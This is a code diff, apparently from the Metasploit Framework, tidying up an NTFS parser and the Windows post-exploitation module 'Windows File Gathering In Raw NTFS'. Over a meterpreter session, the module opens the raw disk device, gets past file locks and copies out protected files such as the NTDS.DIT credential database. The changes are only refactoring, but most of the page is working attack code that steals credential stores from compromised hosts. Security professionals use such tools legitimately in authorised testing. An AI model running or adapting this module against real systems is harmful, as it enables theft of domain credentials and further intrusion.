Small tidyup
parent
970c5d115a
commit
358ab2590e
|
@ -236,7 +236,7 @@ module Rex
|
||||||
def file(path)
|
def file(path)
|
||||||
repertory = mft_record_from_mft_num(5)
|
repertory = mft_record_from_mft_num(5)
|
||||||
index_entry = {}
|
index_entry = {}
|
||||||
for r in path.split('\\')
|
path.split('\\').each do |r|
|
||||||
attributes = mft_record_attribute(repertory)
|
attributes = mft_record_attribute(repertory)
|
||||||
index = index_list_from_attributes(attributes)
|
index = index_list_from_attributes(attributes)
|
||||||
unless index.key?(r)
|
unless index.key?(r)
|
||||||
|
|
|
@ -3,26 +3,27 @@
|
||||||
# Current source: https://github.com/rapid7/metasploit-framework
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
##
|
##
|
||||||
|
|
||||||
|
require 'rex/parser/fs/ntfs'
|
||||||
|
|
||||||
class Metasploit3 < Msf::Post
|
class Metasploit3 < Msf::Post
|
||||||
include Msf::Post::Windows::Priv
|
include Msf::Post::Windows::Priv
|
||||||
require "rex/parser/fs/ntfs"
|
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Windows File Gathering In Raw NTFS',
|
'Name' => 'Windows File Gathering In Raw NTFS',
|
||||||
'Description' => %q{
|
'Description' => %q(
|
||||||
This module gather file using the raw NTFS device, bypassing some Windows restriction.
|
This module gather file using the raw NTFS device, bypassing some Windows restriction.
|
||||||
Gather file from disk bypassing restriction like already open file with write right lock.
|
Gather file from disk bypassing restriction like already open file with write right lock.
|
||||||
Can be used to retreive file like NTDS.DIT
|
Can be used to retreive file like NTDS.DIT),
|
||||||
},
|
|
||||||
'License' => 'MSF_LICENSE',
|
'License' => 'MSF_LICENSE',
|
||||||
'Platform' => ['win'],
|
'Platform' => ['win'],
|
||||||
'SessionTypes' => ['meterpreter'],
|
'SessionTypes' => ['meterpreter'],
|
||||||
'Author' => ['Danil Bazin <danil.bazin[at]hsc.fr>'], #@danilbaz
|
'Author' => ['Danil Bazin <danil.bazin[at]hsc.fr>'], # @danilbaz
|
||||||
'References' => [
|
'References' => [
|
||||||
[ 'URL', 'http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/' ]
|
[ 'URL', 'http://www.amazon.com/System-Forensic-Analysis-Brian-Carrier/dp/0321268172/' ]
|
||||||
]
|
]
|
||||||
))
|
))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
OptString.new('FILE_PATH', [true, 'The FILE_PATH to retreive from the Volume raw device', nil])
|
OptString.new('FILE_PATH', [true, 'The FILE_PATH to retreive from the Volume raw device', nil])
|
||||||
|
@ -32,46 +33,46 @@ class Metasploit3 < Msf::Post
|
||||||
def run
|
def run
|
||||||
winver = sysinfo["OS"]
|
winver = sysinfo["OS"]
|
||||||
|
|
||||||
if winver =~ /2000/i
|
fail_with(Exploit::Failure::NoTarget, 'Module not valid for Windows 2000') if winver =~ /2000/
|
||||||
print_error("Module not valid for Windows 2000")
|
fail_with(Exploit::Failure::NoAccess, 'You don\'t have administrative privileges') unless is_admin?
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
unless is_admin?
|
|
||||||
print_error("You don't have enough privileges")
|
|
||||||
return
|
|
||||||
end
|
|
||||||
|
|
||||||
file_path = datastore['FILE_PATH']
|
file_path = datastore['FILE_PATH']
|
||||||
|
|
||||||
r = client.railgun.kernel32.GetFileAttributesA(file_path)
|
r = client.railgun.kernel32.GetFileAttributesA(file_path)
|
||||||
|
|
||||||
if r['GetLastError'] != 0
|
if r['GetLastError'] != 0
|
||||||
print_error("The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts")
|
fail_with(
|
||||||
return nil
|
Exploit::Failure::BadConfig,
|
||||||
|
'The file does not exist, use file format C:\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts'
|
||||||
|
)
|
||||||
end
|
end
|
||||||
|
|
||||||
drive = file_path[0, 2]
|
drive = file_path[0, 2]
|
||||||
|
|
||||||
r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}", "GENERIC_READ", "FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE",
|
r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}",
|
||||||
nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
|
'GENERIC_READ',
|
||||||
|
'FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE',
|
||||||
|
nil,
|
||||||
|
'OPEN_EXISTING',
|
||||||
|
'FILE_FLAG_WRITE_THROUGH',
|
||||||
|
0)
|
||||||
|
|
||||||
if r['GetLastError'] != 0
|
if r['GetLastError'] != 0
|
||||||
print_error("Error opening #{drive} GetLastError=#{r['ErrorMessage']}")
|
fail_with(
|
||||||
return nil
|
Exploit::Failure::Unknown,
|
||||||
|
"Error opening #{drive}. Windows Error Code: #{r['GetLastError']} - #{r['ErrorMessage']}")
|
||||||
end
|
end
|
||||||
|
|
||||||
@handle = r['return']
|
@handle = r['return']
|
||||||
print_status("Successfuly opened #{drive}")
|
print_status("Successfuly opened #{drive}")
|
||||||
begin
|
begin
|
||||||
fs = Rex::Parser::NTFS.new(self)
|
fs = Rex::Parser::NTFS.new(self)
|
||||||
print_status("Trying gather #{file_path}")
|
print_status("Trying to gather #{file_path}")
|
||||||
path = file_path[3, file_path.length - 3]
|
path = file_path[3, file_path.length - 3]
|
||||||
data = fs.file(path)
|
data = fs.file(path)
|
||||||
file_name = file_path.split("\\")[-1]
|
file_name = file_path.split("\\")[-1]
|
||||||
stored_path = store_loot("windows.file", 'application/octet-stream', session, data, file_name, "Windows file")
|
stored_path = store_loot("windows.file", 'application/octet-stream', session, data, file_name, "Windows file")
|
||||||
print_good("Saving file : #{stored_path}")
|
print_good("Saving file : #{stored_path}")
|
||||||
rescue ::Exception => e
|
|
||||||
print_error("Post failed : #{e.backtrace}")
|
|
||||||
ensure
|
ensure
|
||||||
client.railgun.kernel32.CloseHandle(@handle)
|
client.railgun.kernel32.CloseHandle(@handle)
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue